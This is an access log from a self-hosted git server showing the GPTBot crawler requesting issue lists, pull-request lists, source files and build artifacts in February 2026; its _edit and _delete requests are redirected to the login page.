"/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9827] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 928] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 22757] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:19:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11313] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11356] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 